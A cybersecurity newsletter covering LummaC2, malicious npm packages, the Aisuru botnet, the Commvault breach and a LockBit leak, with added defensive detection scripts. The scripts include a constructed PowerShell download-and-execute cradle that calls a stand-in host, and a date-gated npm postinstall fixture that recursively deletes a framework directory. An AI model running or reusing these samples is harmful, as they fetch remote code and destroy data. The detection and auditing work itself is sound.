CyberBakery Chronicles (26 May 2025)
Welcome to this week’s edition of CyberBakery Chronicles, your trusted source for the latest news in digital security. Whether you're an enthusiastic novice or a seasoned expert, our insightful content aims to keep you informed and engaged.

Your Weekly Cybersecurity Update (26 May 2025)
On May 21, 2025, the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) issued a joint advisory (AA25-141B) highlighting the active exploitation of LummaC2 malware—a sophisticated information stealer targeting critical infrastructure sectors across the United States. 

What Is LummaC2?
LummaC2 is a subscription-based infostealer malware that emerged on Russian-speaking cybercriminal forums in 2022. It is engineered to infiltrate Windows systems (from Windows 7 through Windows 11) and exfiltrate a wide array of sensitive data, including:  
System profiling details
Browser information (cookies, saved passwords, extensions)
Cryptocurrency wallet credentials
Two-factor authentication (2FA) data 
How LummaC2 Operates
Threat actors deploy LummaC2 primarily through spearphishing emails containing malicious hyperlinks or attachments. A notable tactic is a fake CAPTCHA whose "verification" instructions tell the user to open the Windows Run dialogue (Win + R), paste the clipboard contents, and press Enter; the pasted text is a Base64-encoded PowerShell command that downloads the malware. 
To evade detection, LummaC2 is often embedded within spoofed versions of popular software applications, such as multimedia players or utility tools. This obfuscation enables the malware to bypass standard cybersecurity defences, including Endpoint Detection and Response (EDR) solutions and antivirus programs. 
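The execution chain above leaves a recognisable trace in process-creation telemetry: explorer.exe (the Run dialogue) spawning powershell.exe with an -EncodedCommand payload. The script below is an added example written for this newsletter, not code from the advisory; it decodes that payload the way PowerShell does (Base64 over UTF-16LE text) and scores the event with a heuristic of its own. The events, paths, and the example.invalid URL are constructed samples, not indicators from the advisory.

```python
"""Triage process-creation events for the fake-CAPTCHA / Win+R PowerShell pattern.

Added example (not from the advisory). Events below are constructed, not real IOCs.
"""
import base64
import re
from typing import Dict, List, Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...),
# so capture the flag and the Base64 blob, then validate the flag in code.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/]{8,}=*)")
HIDDEN_RE = re.compile(r"(?i)-w[a-z]*\s+hidden|windowstyle\s*=?\s*hidden")
EP_BYPASS_RE = re.compile(r"(?i)-e[a-z]*\s+bypass")
CRADLE_RE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                       r"net\.webclient|invoke-restmethod|\birm\b|start-bitstransfer")
IEX_RE = re.compile(r"(?i)\biex\b|invoke-expression")


def encode_ps(script: str) -> str:
    """Encode the way -EncodedCommand expects: UTF-16LE text, then Base64 (used to build samples)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries a valid -EncodedCommand blob."""
    for m in ENC_RE.finditer(cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # e.g. "-ep Unrestricted" is ExecutionPolicy, not EncodedCommand
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            continue  # not Base64, or not UTF-16LE text: leave it for other rules
    return None


def analyze_event(event: Dict[str, str]) -> Dict[str, object]:
    """Score one event; the weights are this example's own heuristic, not a vendor rule."""
    decoded = decode_encoded_command(event["cmdline"])
    text = event["cmdline"] + " " + (decoded or "")
    indicators: List[str] = []
    score = 0
    if decoded is not None:
        indicators.append("encoded_command")
        score += 1
    # explorer.exe as parent is what the Run dialogue (and shortcuts) produce; weak on its own
    if decoded is not None and event["parent"].lower().endswith("explorer.exe"):
        indicators.append("parent_explorer")
        score += 1
    if HIDDEN_RE.search(text):
        indicators.append("hidden_window")
        score += 1
    if EP_BYPASS_RE.search(text):
        indicators.append("execution_policy_bypass")
        score += 1
    if CRADLE_RE.search(text):
        indicators.append("download_cradle")
        score += 2
    if IEX_RE.search(text):
        indicators.append("invoke_expression")
        score += 2
    return {"image": event["image"], "decoded": decoded, "indicators": indicators,
            "score": score, "suspicious": score >= 3}


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    return [analyze_event(e) for e in events]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {   # constructed: the fake-CAPTCHA chain, pasted into the Run dialogue
        "parent": r"C:\Windows\explorer.exe", "image": PS,
        "cmdline": "powershell.exe -w hidden -nop -ep bypass -enc "
                   + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"),
    },
    {   # constructed: an administrator's interactive command from a console
        "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
        "cmdline": 'powershell.exe -NoProfile -Command "Get-Service -Name Spooler"',
    },
    {   # constructed: a scheduled task that uses -enc for a benign script
        "parent": r"C:\Windows\System32\svchost.exe", "image": PS,
        "cmdline": "powershell.exe -enc " + encode_ps("Get-Date | Out-File C:\\ProgramData\\heartbeat.txt"),
    },
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(r["suspicious"], r["score"], r["indicators"], repr(r["decoded"]))
```

Only the first sample crosses the threshold; the scheduled-task event decodes cleanly but scores one point, which is the point of scoring rather than alerting on every encoded command. Feeding real Sysmon event ID 1 or Windows 4688 records only requires mapping their parent, image and command-line fields onto the three keys used here.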
Technical Capabilities
LummaC2 exhibits advanced functionalities aligned with the MITRE ATT&CK framework:
Process Injection (T1055): Injects malicious code into legitimate processes to evade detection.
Ingress Tool Transfer (T1105): Transfers remote files to compromised systems.
Automated Collection (T1119): Automatically gathers sensitive information, including cryptocurrency wallet details.
Exfiltration Over C2 Channel (T1041): Exfiltrates collected data through command and control channels. 
These capabilities allow LummaC2 to maintain persistence within infected systems and continuously exfiltrate data without immediate detection. 
Mitigation Strategies
To defend against LummaC2, organisations should implement the following measures:
Separate User and Privileged Accounts: Allow only necessary users and applications access to the registry.
User Awareness Training: Educate employees about phishing tactics and the dangers of executing unsolicited instructions.
Endpoint Protection: Deploy advanced EDR solutions capable of detecting and blocking malicious activities associated with LummaC2.
Network Monitoring: Continuously monitor network traffic for unusual patterns indicative of data exfiltration.
Network Segmentation: Use segmentation to prevent access to sensitive systems and information, possibly with the use of a Demilitarised Zone (DMZ) or a virtual private cloud (VPC) instance to isolate systems.
Software Restrictions: Implement application whitelisting to prevent unauthorised software execution.
Regular Updates: Ensure all systems and software are up-to-date with the latest security patches.  
Additionally, organisations are encouraged to review the detailed indicators of compromise (IOCs) provided in the advisory to enhance their detection capabilities. 
Conclusion
The LummaC2 malware represents a significant threat to critical infrastructure sectors, leveraging sophisticated techniques to infiltrate systems and exfiltrate sensitive data. By understanding its operation and implementing robust cybersecurity measures, organisations can mitigate the risks posed by this and similar threats.
A recent investigation by security researcher Kush Pandya from Socket has uncovered a disturbing revelation: eight malicious packages were available on the npm repository for over two years, accumulating approximately 6,200 downloads during that period.

The Malicious Packages and Their Tactics
These malicious packages employed various destructive tactics, including:
Targeted Deletion: Removing files related to Vue.js, a popular JavaScript framework, using commands tailored for both Windows and Linux systems.
Core Function Corruption: Injecting random data into fundamental JavaScript functions, leading to unpredictable behaviour.
Browser Storage Sabotage: Executing a sophisticated three-file attack that corrupted browser storage mechanisms, affecting authentication tokens, user preferences, shopping carts, and application states. This resulted in intermittent failures that persisted even after page refreshes.
Multi-Phase System Attacks: Combining file deletions with forced system shutdowns, amplifying the damage inflicted on affected systems.
Notably, some payloads were programmed to activate on specific dates in 2023, while others were set to initiate in July of that year without a defined end date.
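The behaviours listed above (OS-specific recursive deletes, forced shutdowns, payloads gated on a date) are what a dependency audit should look for, and all of them run from install-time lifecycle scripts. The script below is an added example written for this newsletter, not code from Socket or from any of the packages discussed; it walks a node_modules tree, reports every package with a preinstall/install/postinstall/prepare hook, and flags hook text or bundled JavaScript matching those patterns. The three packages it builds (left-padder, native-thing, demo-timebomb-fixture) are constructed fixtures with made-up names.

```python
"""Audit an npm dependency tree for install-time hooks and time-bomb behaviour.

Added example, not Socket's tooling. Fixture packages and names are constructed.
"""
import json
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
MAX_JS_BYTES = 256 * 1024  # skip huge minified bundles to keep the scan cheap

RISK_PATTERNS = {
    "recursive_delete": re.compile(r"\brm\s+-rf\b|\brmdir\s+/s\b|\bdel\s+/[fqs]\b", re.I),
    "forced_shutdown": re.compile(r"\bshutdown\b|\bpoweroff\b|\breboot\b", re.I),
    "shell_exec": re.compile(r"child_process|\bexec(?:Sync)?\s*\(|\bspawn(?:Sync)?\s*\("),
    "date_gate": re.compile(r"(?:Date\.now\(\)|new Date\([^)]*\))\s*[<>]=?|"
                            r"new Date\(\s*['\"]20\d\d-|Date\.parse\(\s*['\"]20\d\d-"),
}


def audit_package(pkg_dir: Path) -> Optional[Dict[str, object]]:
    """Return a finding for one package directory, or None if it has no install-time hook."""
    try:
        manifest = json.loads((pkg_dir / "package.json").read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return None
    hooks = {k: v for k, v in (manifest.get("scripts") or {}).items() if k in INSTALL_HOOKS}
    if not hooks:
        return None
    # Scan the hook commands plus every bundled .js file the hook could reach.
    text = "\n".join(hooks.values())
    for js in pkg_dir.rglob("*.js"):
        if "node_modules" in js.relative_to(pkg_dir).parts:
            continue  # nested dependencies are audited as their own packages
        if js.stat().st_size <= MAX_JS_BYTES:
            text += "\n" + js.read_text(encoding="utf-8", errors="replace")
    flags = [name for name, pat in RISK_PATTERNS.items() if pat.search(text)]
    destructive = {"recursive_delete", "forced_shutdown"} & set(flags)
    severity = "high" if destructive else "medium" if flags else "review"
    return {"package": manifest.get("name", pkg_dir.name), "version": manifest.get("version", "?"),
            "hooks": hooks, "flags": flags, "severity": severity}


def audit_node_modules(root: Path) -> List[Dict[str, object]]:
    """Audit every package under node_modules, including @scope/name and nested trees."""
    findings = []
    for manifest in sorted(root.rglob("package.json")):
        pkg_dir = manifest.parent
        parent = pkg_dir.parent.name
        if parent != "node_modules" and not parent.startswith("@"):
            continue  # package.json inside test/ or dist/ folders is not a package root
        finding = audit_package(pkg_dir)
        if finding:
            findings.append(finding)
    return findings


def build_fixture_tree(root: Path) -> None:
    """Write three constructed packages: a clean one, a native add-on, and a time-bomb lookalike."""
    def write(pkg: str, manifest: dict, files: Optional[Dict[str, str]] = None) -> None:
        d = root / pkg
        d.mkdir(parents=True, exist_ok=True)
        (d / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
        for rel, body in (files or {}).items():
            (d / rel).parent.mkdir(parents=True, exist_ok=True)
            (d / rel).write_text(body, encoding="utf-8")

    write("left-padder", {"name": "left-padder", "version": "1.0.0"},
          {"index.js": "module.exports = (s, n) => s.padStart(n);\n"})
    write("native-thing", {"name": "native-thing", "version": "2.1.0",
                           "scripts": {"install": "node-gyp rebuild"}})
    write("demo-timebomb-fixture", {"name": "demo-timebomb-fixture", "version": "0.0.3",
                                    "scripts": {"postinstall": "node lib/setup.js"}},
          {"lib/setup.js": (
              "const { exec } = require('child_process');\n"
              "// constructed fixture: date-gated, OS-specific delete of a framework directory\n"
              "if (Date.now() > Date.parse('2023-07-01')) {\n"
              "  exec(process.platform === 'win32' ? 'rmdir /s /q node_modules\\\\vue'\n"
              "                                    : 'rm -rf node_modules/vue');\n"
              "}\n")})


def run_demo() -> Dict[str, Dict[str, object]]:
    """Build the fixtures in a temporary node_modules and return findings keyed by package name."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "node_modules"
        build_fixture_tree(root)
        return {f["package"]: f for f in audit_node_modules(root)}


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

Packages without any install hook are not reported at all, a hook with nothing suspicious is reported as "review" (native add-ons legitimately run node-gyp at install), and the fixture combining a shell call, a recursive delete and a date comparison is "high". Pointing audit_node_modules at a real project's node_modules is the intended use; the heuristics are deliberately simple and will need tuning against the project's own dependencies.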
Broader Implications for the JavaScript Ecosystem
This incident underscores the vulnerabilities inherent in the open-source ecosystem, particularly within the JavaScript community. The ease of publishing packages to repositories like npm, combined with the vast number of dependencies in modern projects, creates an environment where malicious code can remain undetected for extended periods.
The fact that these packages went unnoticed for over two years highlights the need for more robust security measures, including:
Enhanced Vetting Processes: Implementing stricter review protocols for newly published packages.
Automated Threat Detection: Utilising advanced tools to identify and flag suspicious behaviour in packages.
Community Vigilance: Encouraging developers to regularly audit their dependencies and stay informed about potential threats.
Conclusion
The discovery of these long-standing malicious packages serves as a stark reminder of the importance of vigilance in software development. As the reliance on open-source components continues to grow, so does the necessity for comprehensive security practices to protect against such insidious threats.
On May 12, 2025, KrebsOnSecurity, the cybersecurity blog run by investigative journalist Brian Krebs, was targeted by a massive distributed denial-of-service (DDoS) attack that peaked at 6.3 terabits per second (Tbps). This brief yet powerful assault is one of the largest ever recorded and is attributed to a new Internet of Things (IoT) botnet named “Aisuru.” 

Aisuru Botnet: The New Digital Menace
The Aisuru botnet, first identified by researchers at QiAnXin XLab in August 2024, comprises a globally dispersed network of compromised IoT devices, including routers, digital video recorders, and other systems vulnerable due to default passwords or software flaws. After its initial exposure, Aisuru reemerged in November 2024 with enhanced capabilities, incorporating a previously unknown zero-day vulnerability in Cambium Networks cnPilot routers. 
The botnet’s operators have been offering DDoS-for-hire services through public Telegram channels, with subscription tiers ranging from $150 per day to $600 per week, advertising attacks of up to two terabits per second. Notably, they have imposed restrictions on targeting measurement walls, healthcare facilities, schools, or government sites. 
Who’s to blame for this attack?
Attribution in these cases is indeed challenging, but Krebs' blog post decisively identifies an individual known online as “Forky.” This alias is linked to forum posts that prominently offer DDoS services and botnet rentals, and security researchers have firmly connected Forky to discussions involving Aisuru.
In a Telegram conversation with Krebs, Forky outright denied orchestrating the attack on Krebs, claiming that someone else may have exploited the botnet without their direct involvement.
Implications for Cybersecurity
The emergence of the Aisuru botnet and its demonstration of unprecedented attack capabilities highlight the evolving landscape of cyber threats. The fact that such powerful tools are being commercialised and made accessible through DDoS-for-hire services poses significant risks to online infrastructure. Organisations must prioritise securing IoT devices, regularly update software to patch vulnerabilities, and invest in advanced threat detection and mitigation strategies.
On May 22, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding a cyber threat targeting Commvault’s Metallic Microsoft 365 (M365) backup software-as-a-service (SaaS) solution hosted in Microsoft Azure. The breach potentially allowed unauthorised access to client secrets, compromising customers’ M365 environments. 

The breach was initially discovered in February 2025 when Microsoft notified Commvault of unauthorised activity within its Azure environment. A nation-state threat actor exploited a zero-day vulnerability, CVE-2025-3928, in the Commvault Web Server, enabling remote, authenticated attackers to create and execute web shells on compromised systems. This vulnerability affects multiple Commvault versions, including 11.36.0 through 11.36.45, and has been patched in subsequent releases.   
CISA believes this activity may be part of a broader campaign targeting various SaaS providers’ cloud applications with default configurations and elevated permissions. The agency recommends that organisations monitor Microsoft Entra audit logs for unauthorised modifications, implement conditional access policies restricting authentication to approved IP addresses, and rotate application secrets regularly.  
Commvault has stated that, to date, there has been no unauthorised access to customer backup data and that business operations remain unaffected. The company is working closely with cybersecurity firms and authorities, including the FBI and CISA, to investigate the incident and has implemented enhanced security measures, such as key rotation and strengthened monitoring rules. 
Organisations using Commvault’s services are urged to apply the latest security patches, review audit logs for suspicious activity, and follow CISA’s mitigation guidance to protect their environments from similar attacks.
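Two of CISA's recommendations above (review Entra audit logs for unauthorised modifications, and rotate application secrets) can be turned into routine checks. The script below is an added example written for this newsletter, not Commvault's or CISA's code: it flags credential changes on an app registration that originate outside approved networks, and lists secrets older than a rotation window. The records follow a simplified shape of the Microsoft Graph directoryAudits and passwordCredential fields (activityDisplayName, initiatedBy.user.ipAddress, targetResources, keyId, startDateTime) but are constructed; the networks, names and timestamps are made up, and the approved-network list stands in for the conditional access named locations an organisation would actually use.

```python
"""Entra audit-log and secret-age checks for an app registration.

Added example (not Commvault's or CISA's code). All records below are constructed.
"""
import ipaddress
from datetime import datetime, timedelta
from typing import Dict, Iterable, List

# Constructed allowlist (TEST-NET-3); in practice mirrors the conditional access named locations.
APPROVED_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]

# Operations on an app registration that add or change credentials and so warrant review.
CREDENTIAL_OPERATIONS = ("Certificates and secrets management", "Add service principal credentials")

SAMPLE_AUDIT_LOG = [  # constructed, simplified directoryAudits shape
    {"activityDateTime": "2025-02-20T02:14:09Z",
     "activityDisplayName": "Update application – Certificates and secrets management",
     "initiatedBy": {"user": {"userPrincipalName": "backup-admin@example.com", "ipAddress": "203.0.113.17"}},
     "targetResources": [{"displayName": "m365-backup-connector"}]},
    {"activityDateTime": "2025-02-20T03:40:51Z",
     "activityDisplayName": "Update application – Certificates and secrets management",
     "initiatedBy": {"user": {"userPrincipalName": "backup-admin@example.com", "ipAddress": "198.51.100.23"}},
     "targetResources": [{"displayName": "m365-backup-connector"}]},
    {"activityDateTime": "2025-02-20T09:05:00Z",
     "activityDisplayName": "Update user",
     "initiatedBy": {"user": {"userPrincipalName": "helpdesk@example.com", "ipAddress": "203.0.113.40"}},
     "targetResources": [{"displayName": "Jane Doe"}]},
]

SAMPLE_SECRETS = [  # constructed passwordCredential-like entries on the app registration
    {"keyId": "11111111-1111-1111-1111-111111111111", "displayName": "connector-2024",
     "startDateTime": "2024-06-01T00:00:00Z"},
    {"keyId": "22222222-2222-2222-2222-222222222222", "displayName": "connector-2025",
     "startDateTime": "2025-03-01T00:00:00Z"},
]


def _actor(record: Dict) -> Dict:
    """Credential changes may be initiated by a user or by another app; return whichever is present."""
    by = record.get("initiatedBy") or {}
    return by.get("user") or by.get("app") or {}


def is_approved_ip(ip: str, networks: Iterable) -> bool:
    """A missing or malformed source address is treated as unapproved, not ignored."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in networks)


def find_unapproved_credential_changes(records: Iterable[Dict], networks: Iterable) -> List[Dict[str, str]]:
    """Return credential-management operations whose source IP is outside the approved networks."""
    findings = []
    for rec in records:
        name = rec.get("activityDisplayName", "")
        if not any(op in name for op in CREDENTIAL_OPERATIONS):
            continue
        actor = _actor(rec)
        ip = actor.get("ipAddress") or ""
        if is_approved_ip(ip, networks):
            continue
        findings.append({
            "time": rec.get("activityDateTime", ""),
            "operation": name,
            "actor": actor.get("userPrincipalName") or actor.get("displayName") or "unknown",
            "ip": ip or "missing",
            "target": ", ".join(t.get("displayName", "?") for t in rec.get("targetResources", [])),
        })
    return findings


def _parse_time(ts: str) -> datetime:
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def secrets_due_for_rotation(secrets: Iterable[Dict], now_iso: str, max_age_days: int = 90) -> List[str]:
    """Return keyIds of secrets created more than max_age_days before now_iso (an ISO-8601 UTC time)."""
    cutoff = _parse_time(now_iso) - timedelta(days=max_age_days)
    return [s["keyId"] for s in secrets if _parse_time(s["startDateTime"]) < cutoff]


if __name__ == "__main__":
    for f in find_unapproved_credential_changes(SAMPLE_AUDIT_LOG, APPROVED_NETWORKS):
        print("REVIEW:", f)
    print("rotate:", secrets_due_for_rotation(SAMPLE_SECRETS, "2025-05-22T00:00:00Z"))
```

The second sample record is the one worth attention: the same administrator account changing the connector's secrets, but from an address outside the approved range. Real records exported from the Entra audit log or queried through Microsoft Graph carry the same field names used here, so only the sample lists need replacing.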
A significant data breach has exposed the internal operations of the LockBit ransomware group, shedding light on its affiliate structures and tactics. The leaked information, which spans December 19, 2024, to April 29, 2025, provides unprecedented insights into the group’s “LockBit Lite” program—a streamlined version of their ransomware-as-a-service (RaaS) model designed for less experienced cyber criminals.  

LockBit Lite: Lowering the Barrier to Entry
Introduced in December 2024, LockBit Lite offers affiliates access to ransomware tools for a fee of $777 USD, significantly less than the 1 BTC deposit required for the standard program. This lower-tier option allows affiliates to launch attacks swiftly but comes with limitations, such as a lack of direct access to encryption keys and reliance on administrators for decryptors. These constraints have led to operational inefficiencies, including failed decryption even after ransom payments. 
Identifying Prolific Affiliates
Analysis of the leaked data highlights several active affiliates within the LockBit Lite program. Notably, an affiliate operating under the alias “Christopher” engaged in 44 negotiations, while “jhon0722” participated in 42. Other active members include “PiotrBond,” “JamesCraig,” and “Swan.” An individual identified as “matrix777” appears to hold a senior position, with a registration date predating the Lite program’s launch, suggesting a deeper involvement in the group’s operations. 
Targeting Patterns and Ethical Breaches
The leaked records reveal a focus on Chinese organisations, attributed to their perceived willingness to pay ransoms. Surprisingly, some affiliates also targeted Russian entities, violating LockBit’s explicit prohibition against attacking Russian organisations. In one instance, administrator “matrix777” intervened after an affiliate was compromised, suspecting interference from law enforcement or rival groups, and provided a non-functional decryptor. 
Unconventional Recruitment and Victim Interaction
In an unusual twist, LockBit attempted to recruit victims into its RaaS scheme, promoting the $777 entry fee with promises of wealth. While some victims expressed interest, existing affiliates were largely unenthusiastic about onboarding new members. Additionally, affiliates like “Christopher” offered victims basic cybersecurity advice post-attack, including recommendations on password strength and network monitoring, and provided tips to disguise ransom payments as legitimate transactions. 
Implications for Cybersecurity
This data leak offers a rare glimpse into the operational dynamics of a major ransomware group, highlighting the challenges and ethical breaches within its affiliate programs. The exposure of negotiation records and internal communications underscores the risks victims face, even when complying with ransom demands. As LockBit adapts its strategies post-Operation Cronos, understanding these internal mechanisms becomes crucial for cybersecurity professionals aiming to mitigate such threats.
Quick favour: Let’s spread the value! If you find this newsletter useful, don’t keep it to yourself. 👉 Share it with friends and colleagues who could benefit from it. Remember, one share could spark insight, ignite inspiration, or lead to a breakthrough for someone else.
Let’s make 2025 the year of shared knowledge and community growth.